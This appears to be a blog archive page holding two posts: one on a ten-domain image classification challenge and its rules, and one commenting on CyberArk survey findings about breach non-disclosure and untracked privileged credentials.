The goal of this challenge is to solve simultaneously ten image classification problems representative of very different visual domains. The data for each domain is obtained from the following image classification benchmarks:

  1. ImageNet [6].
  2. CIFAR-100 [2].
  3. Aircraft [1].
  4. Daimler pedestrian classification [3].
  5. Describable textures [4].
  6. German traffic signs [5].
  7. Omniglot. [7]
  8. SVHN [8].
  9. UCF101 Dynamic Images [9a,9b].
  10. VGG-Flowers [10].

The union of the images from the ten datasets is split in training, validation, and test subsets. Different domains contain different image categories as well as a different number of images.

The task is to train the best possible classifier to address all ten classification tasks using the training and validation subsets, apply the classifier to the test set, and send us the resulting annotation file for assessment. The winner will be determined based on a weighted average of the classification performance on each domain, using the scoring scheme described below. At test time, your model is allowed to know the ground-truth domain of each test image (ImageNet, CIFAR-100, …) but, of course, not its category.

It is up to you to make use of the data, and you can either train a single model for all tasks or ten independent ones. However, you are not allowed to use any external data source for training. Furthermore, we ask you to report the overall size of the model(s) used.

The competition is over but you can continue to submit results and check the results in the leaderboard. (There’s an idea that merits repetition.)

Will this be your entertainment game for the holidays?

Enjoy!

98% Fail Rate on Privileged Accounts – Transparency in 2018

Filed under: Cybersecurity,Government,Government Data,Security,Transparency — Patrick Durusau @ 9:55 am

Half of companies fail to tell customers about data breaches, claims study by Nicholas Fearn.

From the post:

Half of organisations don’t bother telling customers when their personal information might have been compromised following a cyber attack, according to a new study.

The latest survey from security firm CyberArk comes with the full implementation of the European Union General Data Protection Regulation (GDPR) just months away.

Organisations that fail to notify the relevant data protection authorities of a breach within 72 hours of finding it can expect to face crippling fines of up to four per cent of turnover – with companies trying to hide breaches likely to be hit with the biggest punishments.

The findings have been published in the second iteration the CyberArk Global Advanced Threat Landscape Report 2018, which explores business leaders’ attitudes towards IT security and data protection.

The survey found that, overall, security “does not translate into accountability”. Some 46 per cent of organisations struggle to stop every attempt to breach their IT infrastructure.

And 63 per cent of business leaders acknowledge that their companies are vulnerable to attacks, such as phishing. Despite this concern, 49 per cent of organisations don’t have the right knowledge about security policies.

You can download the report cited in Fearn’s post at: Cyberark Global Advanced Threat Landscape Report 2018: The Business View of Security.

If you think that report has implications for involuntary/inadvertent transparency, Cyberark Global Advanced Threat Landscape Report 2018: Focus on DevOps, reports this gem:


It’s not just that businesses underestimate threats. As noted above, they also do not seem to fully understand where privileged accounts and secrets exist. When asked which IT environments and devices contain privileged accounts and secrets, responses (IT decision maker and DevOps/app developer respondents) were at odds with the claim that most businesses have implemented a privileged account security solution. A massive 98% did not select at least one of the ‘containers’, ‘microservices’, ‘CI/CD tools’, ‘cloud environments’ or ‘source code repositories’ options. At the risk of repetition, privileged accounts and secrets are stored in all of these entities.

A fail rate of 98% on identifying “privileged accounts and secrets?”

Reports like this make you wonder about the clamor for transparency of organizations and governments. Why bother?

Information in 2018 is kept secure by a lack of interest in collecting it.

Remember that for your next transparency discussion.

« Newer PostsOlder Posts »

Powered by WordPress